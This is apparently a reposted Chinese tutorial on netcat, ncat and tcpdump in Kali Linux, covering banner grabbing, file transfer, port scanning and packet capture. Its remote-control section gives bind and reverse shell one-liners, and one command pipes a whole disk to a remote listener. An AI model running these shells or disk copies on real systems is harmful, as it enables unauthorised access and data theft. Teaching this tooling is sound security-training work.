kali NETCAT NC的使用
文章目錄
- nc的常用選項
- NC具有的常用功能
- telnet / 獲取banner信息
- 傳輸文本信息
- 傳輸文件/目錄
- 加密傳文件
- 端口掃描
- 遠程克隆硬盤
- 遠程控制
- NCAT
- TCPDUMP簡單用法
nc的常用選項
-l 開啟監聽模式,用于入站鏈接
-p 開放本地端口
-n 遠程連接,后面要跟上端口
-v 顯示詳細信息
-q 執行操作后退出,可以添加延遲時間
-z 端口掃描
-u UDP模式
-c 添加使用權限
NC具有的常用功能
? 網絡工具中的瑞?軍?——小身材、大智慧
? 偵聽模式 / 傳輸模式
? telnet / 獲取banner信息
? 傳輸文本信息
? 傳輸文件/目錄
? 加密傳輸文件
? 遠程控制/木?
? 加密所有流量
? 流媒體服務器
? 遠程克隆硬盤
telnet / 獲取banner信息
nc –nv 1.1.1.1 110
nc –nv 1.1.1.1 25
作用:可以通過連接端口獲取一些banner信息,確定服務器上開發的端口是不是此服務
例如:ssh服務工作端口是TCP 22
通過此圖,用nc連接目標服務器22端口,不一定就是SSH服務
開放本地服務22端口,讓服務器通過ssh連接,可以發現服務器上SSH服務的banene信息
傳輸文本信息
A:nc -lp 4444
B:nc –nv 1.1.1.1 4444
作用:服務器可以開放本地端口,讓客戶端來連接此端口用來做聊天工具
服務器
客戶端
傳輸文件/目錄
傳輸文件:
A:nc -lp 333 > 1.mp4
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1
或
A:nc -q 1 -lp 333 < a.mp4
B:nc -nv 1.1.1.1 333 > 2.mp4==
傳輸目錄
A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –==
加密傳文件
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
端口掃描
TCP掃描:
nc -nvz 1.1.1.1 1-65535==
UDP掃描:
nc –vnzu 1.1.1.1 1-1024
一般用NC使用UDP掃描準確度非常低,不建議用NC掃
遠程克隆硬盤
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
遠程電子取證,可以將目標服務器硬盤遠程復制,或者內存。
遠程控制
正向控制:
A:nc -lp 333 -c bash
B:nc -nv 1.1.1.1 333==
反向控制:
A:nc -lp 333
B:nc -nv 1.1.1.1 333 -c bash
NCAT
NCAT比NC更具有安全性,支持加密和身份驗證的能力,NC不支持。
ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
(–allow 進行身份驗證,–ssl進行加密算法)
ncat -nv 1.1.1.1 333 --ssl
通過wireshark抓包對?比nc、ncat加密與不加密的流量
nc
NCAT
TCPDUMP簡單用法
No-GUI的抓包分析?工具
Linux、Unix系統默認安裝
tcpdump -i eth0 -s 0 -w file.pcap
(-i選擇網卡,-w保存格式,-n篩選條件,-r讀取文件)
讀取抓包文件
cpdump -r file.pcap
TCPDUMP——篩選
? tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u
? tcpdump -n src host 145.254.160.237 -r http.cap
? tcpdump -n dst host 145.254.160.237 -r http.cap
? tcpdump -n port 53 -r http.cap
? tcpdump -nX port 80 -r http.cap
總結
以上是生活随笔為你收集整理的kali NETCAT NC的使用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: IIS-ShortName-Scanne
- 下一篇: centos8如何安装yum源(详细步骤